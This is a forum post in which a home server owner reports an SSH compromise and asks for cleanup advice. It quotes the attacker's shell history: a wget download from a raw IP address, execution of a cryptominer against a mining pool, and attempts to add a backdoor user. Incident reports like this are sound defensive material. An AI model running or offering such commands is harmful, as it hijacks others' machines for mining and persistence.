Results 1 to 10 of 26

Thread: Xubuntu 12.04/64, OpenSSH Server Hacked

Threaded View

  1. #1
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Xubuntu 12.04/64, OpenSSH Server Hacked

    Last night I discovered a task on my Xubuntu 12.04/64 server (yes, conky is nice to have) as a process "m64.pl" used about 85-100% CPU time. After checking with everyone in my family I see the only option, I have got hacked, possibly through a Windows 7 computer since port 22 is closed in DSL router.

    Here is bash history left by hacker :

    free -m
    cat /proc/cpuinfo
    uname -a
    ls -l
    cd Public
    wget 79.114.47.143/m64.zip
    unzip m64.zip
    chmod +x *
    ./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
    ps -x
    pgrep minerd
    w
    ifconfig
    sude
    sudo
    sudo useradd ruut
    useradd ruut
    su root useradd
    exit

    To me it seems that someone has started a bitcoin task

    What I have done is killing the process, remove files in /Public (had to do it in root as they where locked) and uninstall "OpenSSH Server".

    Any suggestions on how to handle this would be most appreciated

    Morten (Smiling after all)
    Last edited by mbogevik; February 4th, 2014 at 07:54 PM.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •